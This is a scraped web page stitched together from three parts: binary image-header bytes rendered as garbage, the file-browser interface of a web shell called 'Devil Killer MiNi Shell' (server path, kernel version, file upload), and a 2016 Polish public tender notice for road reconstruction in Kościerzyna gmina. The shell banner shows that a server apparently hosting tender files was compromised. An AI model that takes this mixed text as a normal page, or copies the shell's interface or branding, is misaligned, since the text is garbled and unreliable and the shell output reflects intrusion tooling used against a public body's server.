JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160707/125179-N-2016.html

<p class="kh_header"><b>Kościerzyna: Przebudowa nawierzchni dróg gminnych w miejscowościach: Łubiana ul. Rzemieślnicza, Sarnowy, Kościerzyna Wybudowanie ul. Kalinowa, Wąglikowice ul. Kościerska (chodnik), Rotenbark, Skorzewo, Niedamowo, gm. Kościerzyna.</b><br>
<b>Numer ogłoszenia: 125179 - 2016; data zamieszczenia: 07.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Komunalny Gminy Kościerzyna , Stare Nadleśnictwo 5, 83-400 Kościerzyna, woj. pomorskie, tel. 058 6866342, faks 058 6866960.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa nawierzchni dróg gminnych w miejscowościach: Łubiana ul. Rzemieślnicza, Sarnowy, Kościerzyna Wybudowanie ul. Kalinowa, Wąglikowice ul. Kościerska (chodnik), Rotenbark, Skorzewo, Niedamowo, gm. Kościerzyna..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przebudowę odcinka drogi gminnej 187067G - ul. Rzemieślniczej w miejscowości Łubiana. 
W pasie drogi gminnej zaprojektowano przebudowę istniejącego odcinka drogi gminnej na drogę o nawierzchni z betonu asfaltowego. Szerokość projektowanej jezdni wynosi 5,0 m. Promienie skrętu pokazano w części rysunkowej. Niweletę jezdni dostosowano do istniejącego terenu, zjazdów na posesje oraz do potrzeb odwodnienia. Niweletę jezdni założono w teoretycznej osi i pokazano w części rysunkowej.
Szerokość jezdni: 5,00 m, powierzchnia 714,65 m2
Spadek poprzeczny: jednostronny i daszkowy o wartości od 2 %
Przyjęto następującą konstrukcję nawierzchni jezdni:
4 cm warstwa ścieralna z betonu asfaltowego
5 cm po warstwa wiążąca z betonu asfaltowego
20 cm warstwa podbudowy zasadniczej z mieszanki niezwiązanej kruszywem C90/3, Obramowanie jezdni zaprojektowano odcinkowo z krawężnika betonowego 15x30x100 ułożonego na ławie betonowej oporem z betonu C-12/15, opornika betonowego 12x25x100 cm na skrzyżowaniu.
Wywóz i zagospodarowanie nadmiaru gruntu w gestii wykonawcy. 
Przedmiot zamówienia szczegółowo określa dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót, stanowiąca załącznik nr 1 do SIWZ. Załączone przedmiary robót nie stanowią podstawy przygotowania kosztu oferty, lecz narzędzie pomocnicze do jej sporządzenia. 

2. Przebudowę odcinka drogi gminnej w miejscowości Sarnowy.
W pasie drogi gminnej zaprojektowano przebudowę istniejącego odcinka drogi gminnej na drogę o nawierzchni z betonu asfaltowego. Szerokość projektowanej jezdni wynosi 4,5 m. Promienie skrętu pokazano w części rysunkowej. Niweletę jezdni dostosowano do istniejącego terenu, zjazdów na posesje oraz do potrzeb odwodnienia. Niweletę jezdni założono w teoretycznej
osi i pokazano w części rysunkowej.
Szerokość jezdni: 5,00 m, powierzchnia 533,50 m2
Spadek poprzeczny: jednostronny o wartości od 2 %
4 cm warstwa ścieralna z betonu asfaltowego
5 cm po warstwa wiążąca z betonu asfaltowego
20 cm warstwa podbudowy zasadniczej z mieszanki niezwiązanej kruszywem C90/3
Obramowanie jezdni zaprojektowano z krawężnika betonowego 15x30x100 ułożonego na ławie betonowej oporem z betonu 
C-12/15. Ustawienie krawężników na ławach betonowych wykonuje się na podsypce cementowo - piaskowej.
Wywóz i zagospodarowanie nadmiaru gruntu w gestii wykonawcy. 
Przedmiot zamówienia szczegółowo określa dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót, stanowiąca załącznik nr 1 do SIWZ. Załączone przedmiary robót nie stanowią podstawy przygotowania kosztu oferty, lecz narzędzie pomocnicze do jej sporządzenia. 

3. Przebudowę nawierzchni drógi gruntowej - ul. Kalinowa wraz z odwodnieniem w miejscowości Kościerzyna Wybudowanie.
W pasie drogi gminnej zaprojektowano przebudowę nawierzchni istniejącej drogi. 
Szerokość jezdni: 5,00 m, Powierzchnia  2615 m2 - beton asfaltowy, 149,00 m2 - płyty drogowe typu YOMB, 
Spadek poprzeczny: jednostronny o wartości 1-2%.
Przyjęto następującą konstrukcję nawierzchni jezdni:
4 cm warstwa ścieralna z betonu asfaltowego
4 cm po warstwa wiążąca z betonu asfaltowego
20 cm podbudowa z kruszywa łamanego stabilizowanego mechanicznie
15 cm warstwa gruntu stabilizowanego cementem . Przyjęto następującą konstrukcję nawierzchni zjazdów:
8 cm kostka betonowa
3 cm podsypka piaskowo - cementowa 1:4
20 cm podbudowa z kruszywa łamanego stabilizowanego mechanicznie
Odwodnienie drogi wojewódzkiej funkcjonuje jako powierzchniowe z odprowadzeniem wód opadowych na istniejące skarpy trawiaste. Odwodnienie jezdni ulicy Kalinowej zaplanowano powierzchniowe z odprowadzeniem do wpustów odwodnieniowych oraz komór drenażowych zlokalizowanych pod jezdnią. Projekt odwodnienia stanowi odrębne opracowanie branżowe.
Wywóz i zagospodarowanie nadmiaru gruntu w gestii wykonawcy. 
Przedmiot zamówienia szczegółowo określa dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót, stanowiąca załącznik nr 1 do SIWZ. Załączone przedmiary robót nie stanowią podstawy przygotowania kosztu oferty, lecz narzędzie pomocnicze do jej sporządzenia. 

4. Przebudowa chodnika w pasie drogowym drogi powiatowej Kościerzyna - Wdzydze nr 2403G w miejscowości Wąglikowice.
W pasie drogi powiatowej zaprojektowano przebudowę istniejącego odcinka drogi polegająca na przebudowie chodnika oraz zjazdów na posesje o nawierzchni z kostki betonowej oraz na budowie miejsc parkingowych i chodnika w obrębie remizy strażackiej i sklepu spożywczego. Chodnik wraz ze zjazdami znajduje się po lewej stronie drogi w bezpośrednim sąsiedztwie jezdni.
W obrębie sklepu spożywczego zaprojektowano zatokę parkingową wraz z chodnikiem. W obrębie remizy strażackiej zaprojektowano miejsca parkingowe prostopadle do jezdni drogi oraz chodnik. W ramach realizacji inwestycji zaprojektowano przebudowę zjazdów na posesje.
Chodniki z kostki brukowej betonowej grubości 6 cm na podsypce cementowopiaskowej z wypełnieniem spoin piaskiem 704 m2, Zjazdy z kostki brukowej betonowej grubości 8 cm na podsypce cementowopiaskowej z wypełnieniem spoin piaskiem 525,50 m2.
Szerokość chodnika: 1,50 m
Przyjęto następującą konstrukcję nawierzchni chodnika:
6 cm kostka betonowa
3 cm podsypka piaskowo - cementowa
10 cm warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie
Przyjęto następującą konstrukcję nawierzchni zjazdów:
8 cm kostka betonowa
3 cm podsypka piaskowo - cementowa
25 cm warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie
Wywóz i zagospodarowanie nadmiaru gruntu w gestii wykonawcy.
Przedmiot zamówienia szczegółowo określa dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót, stanowiąca załącznik nr 1 do SIWZ. Załączone przedmiary robót nie stanowią podstawy przygotowania kosztu oferty, lecz narzędzie pomocnicze do jej sporządzenia. 

5. Przebudowa nawierzchni drogi gminnej w miejscowości Rotembark. 
W pasie drogi gminnej zaplanowano wymianę nawierzchni gruntowej na nawierzchnię z betonowych płyt prefabrykowanych typu YOMB. Szerokość projektowanej drogi wynosi 5,5 m w tym jezdnia o szerokości 4,0 m i obustronne pobocza o szerokości 0,75 m.
Dla kategorii ruchu KR1, na podłożu G1 przyjęto następującą konstrukcję nawierzchni jezdni drogi gminnej:
12,5 cm płyta batonowa typu YOMB, 10 cm warstwa podsypki piaskowej.
Jezdnia ograniczona z jednej lub obu stron poboczami gruntowymi z kruszywa naturalnego stabilizowanego mechanicznie gr.10 cm.
Szerokość poboczy wynosi od 0,5 m do 75 cm., spadek poprzeczny wynosi 6%
Na odcinku od km 0+020 do km 0+060 zaprojektowano umocnienie skarpy z betonowych płyt ażurowych typu MEBA o wymiarach 60x40x10 cm na podsypce piaskowej w wypełnieniem otworów humusem i obsianiem nasionami traw. Powierzchnia 360 m2.
Wywóz i zagospodarowanie nadmiaru gruntu w gestii wykonawcy. 
Przedmiot zamówienia szczegółowo określa dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót, stanowiąca załącznik nr 1 do SIWZ. Załączone przedmiary robót nie stanowią podstawy przygotowania kosztu oferty, lecz narzędzie pomocnicze do jej sporządzenia. 

6. Przebudowa odcinka drogi gminnej w miejscowości Skorzewo.
W pasie drogi gminnej zaplanowano wymianę nawierzchni gruntowej na nawierzchnię z kruszywa łamanego stabilizowanego mechanicznie oraz na nawierzchnię z betonowych płyt prefabrykowanych typu YOMB o powierzchni 463 m2.
Szerokość projektowanej drogi wynosi 3,0 m. Pobocza należy wykonać z gruntu rodzimego.
Niweletę projektowanej przebudowy dostosowano do potrzeb odwodnienia.
Dla kategorii ruchu KR1, na podłożu G1 przyjęto następującą konstrukcję nawierzchni jezdni drogi gminnej:
10 cm warstwa z kruszywa łamanego stabilizowanego mechanicznie - na odcinku od km 0+000,00 do km 0+192,71 oraz od km 0+346,71 do km 0+698,59, 12,5 cm płyta batonowa typu YOMB na podsypce piaskowej gr. 10 cm na odcinku od km 0+192,71 do km 0+346,71.Jezdnia ograniczona z obu stron poboczami gruntowymi Szerokość poboczy wynosi 75 cm, spadek poprzeczny wynosi 6%.
Dzięki ukształtowanym spadkom poprzecznym jezdni, jak również spadkowi podłużnemu wg niwelety woda deszczowa zostanie odprowadzona powierzchniowo z odprowadzeniem na przyległe skarpy trawiaste.
Wywóz i zagospodarowanie nadmiaru gruntu w gestii wykonawcy. 
Przedmiot zamówienia szczegółowo określa dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót, stanowiąca załącznik nr 1 do SIWZ. Załączone przedmiary robót nie stanowią podstawy przygotowania kosztu oferty, lecz narzędzie pomocnicze do jej sporządzenia. 

7. Przebudowa odcinka drogi gminnej 187007G w miejscowości Niedamowo. 
W pasie drogi gminnej zaprojektowano przebudowę istniejącego odcinka drogi gruntowej o długości 600 mb. na drogę o nawierzchni z betonu asfaltowego. Szerokość projektowanej jezdni wynosi 5,0 m.
Niweletę jezdni dostosowano do istniejącego terenu oraz do potrzeb odwodnienia. w części rysunkowej.
Szerokość jezdni: 5,00 m, powierzchnia 2658,15 m2.
Szerokość poboczy z kruszywa: 0,75 m
Nawierzchnia jezdni: beton asfaltowy
Spadek poprzeczny: jednostronny i daszkowy o wartości 2%
Konstrukcję nawierzchni przyjęto zgodnie z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie.
Przyjęto następującą konstrukcję nawierzchni jezdni
4 cm warstwa ścieralna z betonu asfaltowego
4 cm po warstwa wiążąca z betonu asfaltowego
20 cm podbudowa z kruszywa łamanego stabilizowanego mechanicznie
Jezdnia ograniczona z obu stron poboczami gruntowymi z kruszywa łamanego stabilizowanego mechanicznie gr. 10 cm. Szerokość poboczy wynosi 0,75 m., spadek poprzeczny wynosi 6%.
Dzięki ukształtowanym spadkom poprzecznym jezdni, jak również spadkowi podłużnemu wg niwelety woda deszczowa zostanie odprowadzona powierzchniowo z odprowadzeniem na przyległe skarpy i do rowów trawiastych. Wody opadowe nie będą oddziaływały na tereny sąsiednie.
Wywóz i zagospodarowanie nadmiaru gruntu w gestii wykonawcy. 
Przedmiot zamówienia szczegółowo określa dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót, stanowiąca załącznik nr 1 do SIWZ. Załączone przedmiary robót nie stanowią podstawy przygotowania kosztu oferty, lecz narzędzie pomocnicze do jej sporządzenia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.00-1, 45.23.13.00-8, 45.23.24.10-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda wniesienia wadium w wysokości 
Część 1: 			1 500,00 zł (słownie: jeden tysiąc pięćset złotych)
Część 2: 			1 000,00 zł (słownie: jeden tysiąc złotych)
Część 3: 			8 000,00 zł (słownie: osiem tysięcy złotych)
Część 4: 			2 000,00 zł (słownie: dwa tysiące złotych)
Część 5: 			   600,00 zł.(słownie: sześćset złotych)
Część 6: 			1 000,00 zł (słownie: jeden tysiąc złotych)
Część 7: 			3 500 (słownie: trzy tysiące pięćset złotych )
Wadium należy wnieść w nieprzekraczalnym terminie do 22.07.2016 r. do godz. 10:00
2.	  Wadium może być wniesione w następujących formach:
2.1.	pieniądzu,
2.2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym 
              że poręczenie kasy jest zawsze poręczeniem pieniężnym,
2.3.	gwarancjach bankowych,
2.4.	gwarancjach ubezpieczeniowych,
2.5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (j.t. Dz.U. z 2007 r. Nr 42, poz. 275 ze zm.),.
20.3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego Bank Spółdzielczy w Kościerzynie 74 8328 0007 2001 0007 5688 0003 z dopiskiem wadium w przetargu ZP.271.07.2016.MS;</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przedmiotowego warunku udziału w postępowaniu będzie dokonana na zasadzie 
               spełnia/nie spełnia. Warunek ten zostanie uznany za spełniony jeśli Wykonawca przedłoży 
              oświadczenie o spełnianiu warunków - wypełnione i podpisane, według wzoru stanowiącego załącznik 
               nr 1 do formularza oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przedmiotowego warunku udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie roboty budowlane, polegające na budowie lub przebudowie nawierzchni dróg o łącznej wartości nie mniejszej niż:
Część 1 zamówienia -     80000,00 zł brutto.
Część 2 zamówienia -     60000,00 zł brutto.
Część 3 zamówienia -   400000,00 zł brutto.
Część 4 zamówienia -   200000,00 zł brutto.
Część 5 zamówienia -     30000,00 zł brutto.
Część 6 zamówienia -     60000,00 zł brutto.
Część 7 zamówienia -   200000,00 zł brutto.
           Na potwierdzenie spełnienia warunku Wykonawca składa wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przedmiotowego warunku udziału w postępowaniu będzie dokonana na zasadzie 
               spełnia/nie spełnia. Warunek ten zostanie uznany za spełniony jeśli Wykonawca przedłoży 
              oświadczenie o spełnianiu warunków - wypełnione i podpisane, według wzoru stanowiącego załącznik 
               nr 1 do formularza oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony jeżeli Wykonawca wykaże, iż na czas realizacji zamówienia, wśród osób wykonujących zamówienie dysponuje, bądź będzie dysponował  do pełnienia funkcji kierownika budowy - minimum jedną osobą posiadającą uprawnienia budowlane  do kierowania robotami budowlanymi w specjalności drogowej w zakresie budowy dróg  lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przedmiotowego warunku udziału w postępowaniu będzie dokonana na zasadzie 
               spełnia/nie spełnia. Warunek ten zostanie uznany za spełniony jeśli Wykonawca przedłoży 
              oświadczenie o spełnianiu warunków - wypełnione i podpisane, według wzoru stanowiącego załącznik 
               nr 1 do formularza oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Na podstawie § 1 ust. 4 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 r. poz. 231) Zamawiający wymaga, aby Wykonawca w celu wykazania spełniania warunku udziału w postępowaniu w zakresie posiadania wymaganej wiedzy i doświadczenia załączył do oferty wykaz wykonanych robót budowlanych oraz dowody, o których mowa wyżej, jedynie w takim zakresie, jaki jest niezbędny do potwierdzenia wykazania spełniania przez Wykonawcę zastrzeżonego przez Zamawiającego warunku udziału w postępowaniu.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy Wykonawca przy wykonywaniu zamówienia polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.</p>

